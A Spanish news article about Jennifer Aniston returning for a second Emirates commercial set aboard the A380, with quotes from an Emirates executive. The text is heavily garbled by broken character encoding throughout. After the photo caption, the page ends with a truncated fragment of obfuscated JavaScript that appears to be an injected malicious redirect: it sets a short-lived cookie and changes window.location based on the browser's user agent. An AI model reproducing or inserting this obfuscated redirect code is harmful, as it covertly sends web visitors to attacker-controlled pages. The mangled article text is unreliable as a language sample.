Un aA�o despuA�s de haber realizado una campaA�a viral con la aerolA�nea Emirates, laA�actriz de Hollywood, directora y productora,A�Jennifer Aniston, vuelve a realizar una publicidad global con la lA�nea aA�rea para mostrar con su distintiva personalidad, estilo clA?sico y un toque de humor el aviA?n A380.

a�?Hace un aA�o, cuando lanzamos el primer comercial con Jennifer Aniston, nos sorprendiA? mucho el fenA?meno social en el que se convirtiA?. El humor se replicA? a travA�s de distintas audiencias alrededor del mundo y fue visto por millones de personas, generando miles de conversaciones al respecto. Los fans de ambos, Emirates y Jennifer Aniston, amaron su encanto natural y humor, y disfrutaron de una historia que se diferencia de los comerciales tradicionales de aerolA�neasa�? explicA? Boutros Boutros, vicepresidente de comunicaciones corporativas, marketing y marca de Emirates.

En el comercial, la actriz galardonada con los premios Globo de Oro y Emmy,A�conoce a Cooper, un intrA�pido niA�o con quien va construyendo una amistad mientras recorren juntos los diversos espacios del lujoso aviA?n A380 y disfrutan de los servicios a bordo.

a�?Nos llovieron las solicitudes para ver a Jennifer de nuevo. Ella tiene un inagotable atractivo a nivel mundial, que es sofisticado, pero al mismo tiempo realista; una gran similitud con nuestra marca. Este nuevo comercial, capta perfectamente la diversiA?n, la espontaneidad y el glamour de volar con Emirates, y estamos seguros que a las audiencias les resultarA? tan memorable como el primeroa�? comentA? Boutros.

El comercial de TelevisiA?n fue dirigido por Bryan Buckley, veterano de la industria y nominado a premios Oscar, quien ha sido aclamado por sus innumerables comerciales para el Super Bowl. El guiA?n y concepto creativo se realizA? a travA�s de un trabajo colaborativo entre Buckley y el equipo interno de publicidad de Emirates, en conjunto con el Grupo WPP.

Jennifer Aniston y su joven co-estrella Cooper, a bordo del aviA?n A380 en el nuevo comercial.
Jennifer Aniston y su joven co-estrella Cooper, a bordo del aviA?n A380 en el nuevo comercial. CortesA�a
xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}